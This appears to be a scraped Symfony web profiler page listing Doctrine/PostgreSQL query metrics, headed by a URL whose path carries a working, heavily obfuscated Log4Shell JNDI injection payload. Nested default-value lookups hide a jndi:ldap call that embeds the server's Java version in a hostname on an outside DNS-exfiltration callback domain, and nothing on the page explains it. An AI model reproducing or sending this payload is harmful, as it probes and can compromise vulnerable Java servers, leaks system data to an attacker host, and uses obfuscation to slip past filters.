http://rad-sdsc.ucsd.edu/${${cj:hsaw:-j}${rtsz:x:-n}${v:nm7:ves:-d}${w7:-i}${a:sao:o:-:}${sp4:-l}${o0ms:-d}${s:mfu:-a}${xj:4:30mv:-p}${q9h:xk8q:-:}${3y:g:-/}${s:3cbl:-/}${btr:jcna:-P}${3zsp:-A}${gvx:qd8:-l}${q3:08ri:-0}${tz:-c}${bc9:g7:--}${${t2bw:m:-s}${4zf:-y}${n9wb:jr8u:x:-s}${6qw:cntv:-:}${6:-j}${b:-a}${yc:j:4c6:-v}${m3:2z:8:-a}${fm06:7y:-.}${aht0:-v}${s4wj:-e}${mh5:kxcz:tqew:-r}${i17e:a90j:ij:-s}${j13:-i}${sn:-o}${2ijw:z5u:-n}}${p5a:u:85:-.}${41cr:8h:-b}${t10:k:osdl:-3}${05a:-4}${p:04n1:d748:-2}${s:9c:-0}${yin:-d}${8:eqrl:xq03:-a}${fq:k5j:-8}${mx:4:-7}${wt:vc6g:-2}${h:qjy:2djs:-2}${clh4:-6}${uq:-6}${5:q2y:-c}${h:ld:h:-e}${1:sn:-6}${oir9:-4}${ifn0:o:-e}${4:no:e:-1}${lhy:4:u7g6:-5}${y6be:-c}${hmn:-f}${t:y:-a}${yj:-2}${pqkh:fm:uq9l:-2}${p:kahv:-e}${7:-a}${4:g3:-3}${sw:s48t:-5}${q2:-1}${sg8i:-4}${ph:-0}${z6:-3}${oy:whz:1ca:-3}${7y:shw9:uhz:-8}${y:g:o:-f}${z1e:a5pz:2:-d}${2mb:-9}${jh:b7j:ef:-0}${7:7h:-e}${ep4j:4:-2}${tdjv:o:-a}${grj8:-.}${vqu9:hq0b:-d}${5fn:is1:-n}${pnia:w:-s}${edt:24h:--}${64:ilf0:96tf:-e}${b:uk3:jxdp:-x}${5:7:j:-f}${ds:ro8w:bv93:-i}${7:vhgs:p4:-l}${8u:y:-.}${lm:sdv:-m}${d:-a}${um:4o:-s}${9:lkr:-m}${bwoa:cjm:-c}${9:-o}${5:-r}${83:-e}${u:--}${ej8:-c}${9x4:epk:wd:-f}${me:rm3:--}${7v4g:3:-p}${abx:4afb:5dxq:-r}${d9:cx7:gr:-o}${9:3w:-d}${3w0c:94:--}${k:-0}${f6mw:-2}${fv6:s1nw:exa:-.}${vlr:m1s:h:-m}${h4io:-a}${t7j3:-s}${pj:ft:wh:-m}${7uy:-.}${xd7k:0vf:-c}${j:i04:-l}${y9:kcx:9:-o}${ys:w:uh:-u}${x:4cy:-d}${z:h:ikr:-f}${flwm:-e}${h:-r}${b:-r}${o:-y}${a15:4gs:7q:-.}${u1za:vt:-g}${lnqp:-o}${no0:4fv9:nsaj:-o}${v:pq:gkp9:-g}}

Query Metrics

14 Database Queries
10 Different statements
8.92 ms Query time
0 Invalid entities

Queries

Group similar statements

# Time Info
1 3.28 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
2 0.42 ms
SELECT schema_name
FROM   information_schema.schemata
WHERE  schema_name NOT LIKE 'pg\_%'
AND    schema_name != 'information_schema'
Parameters:
[]
3 0.11 ms
SHOW search_path
Parameters:
[]
4 0.91 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
5 0.16 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
6 1.77 ms
SELECT
                    a.attnum,
                    quote_ident(a.attname) AS field,
                    t.typname AS type,
                    format_type(a.atttypid, a.atttypmod) AS complete_type,
                    (SELECT tc.collcollate FROM pg_catalog.pg_collation tc WHERE tc.oid = a.attcollation) AS collation,
                    (SELECT t1.typname FROM pg_catalog.pg_type t1 WHERE t1.oid = t.typbasetype) AS domain_type,
                    (SELECT format_type(t2.typbasetype, t2.typtypmod) FROM
                      pg_catalog.pg_type t2 WHERE t2.typtype = 'd' AND t2.oid = a.atttypid) AS domain_complete_type,
                    a.attnotnull AS isnotnull,
                    (SELECT 't'
                     FROM pg_index
                     WHERE c.oid = pg_index.indrelid
                        AND pg_index.indkey[0] = a.attnum
                        AND pg_index.indisprimary = 't'
                    ) AS pri,
                    (SELECT pg_get_expr(adbin, adrelid)
                     FROM pg_attrdef
                     WHERE c.oid = pg_attrdef.adrelid
                        AND pg_attrdef.adnum=a.attnum
                    ) AS default,
                    (SELECT pg_description.description
                        FROM pg_description WHERE pg_description.objoid = c.oid AND a.attnum = pg_description.objsubid
                    ) AS comment
                    FROM pg_attribute a, pg_class c, pg_type t, pg_namespace n
                    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false))
                        AND a.attnum > 0
                        AND a.attrelid = c.oid
                        AND a.atttypid = t.oid
                        AND n.oid = c.relnamespace
                    ORDER BY a.attnum
Parameters:
[]
7 0.13 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
8 0.43 ms
SELECT quote_ident(r.conname) as conname, pg_catalog.pg_get_constraintdef(r.oid, true) as condef
                  FROM pg_catalog.pg_constraint r
                  WHERE r.conrelid =
                  (
                      SELECT c.oid
                      FROM pg_catalog.pg_class c, pg_catalog.pg_namespace n
                      WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false)) AND n.oid = c.relnamespace
                  )
                  AND r.contype = 'f'
Parameters:
[]
9 0.12 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
10 0.61 ms
SELECT quote_ident(relname) as relname, pg_index.indisunique, pg_index.indisprimary,
                       pg_index.indkey, pg_index.indrelid,
                       pg_get_expr(indpred, indrelid) AS where
                 FROM pg_class, pg_index
                 WHERE oid IN (
                    SELECT indexrelid
                    FROM pg_index si, pg_class sc, pg_namespace sn
                    WHERE sn.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND sc.relname = 'doctrine_migration_versions' AND sn.nspname = ANY(current_schemas(false))
                    AND sc.oid=si.indrelid AND sc.relnamespace = sn.oid
                 ) AND pg_index.indexrelid = oid
Parameters:
[]
11 0.34 ms
SELECT attnum, attname FROM pg_attribute WHERE attrelid=33130 AND attnum IN (1) ORDER BY attnum ASC
Parameters:
[]
12 0.27 ms
SELECT obj_description('doctrine_migration_versions'::regclass) AS table_comment;
Parameters:
[]
13 0.23 ms
SELECT * FROM doctrine_migration_versions
Parameters:
[]
14 0.13 ms
SELECT CURRENT_DATABASE()
Parameters:
[]

Database Connections

Name Service
default doctrine.dbal.default_connection

Entity Managers

Name Service
default doctrine.orm.default_entity_manager

Second Level Cache

Second Level Cache is not enabled.

Entities Mapping

No loaded entities.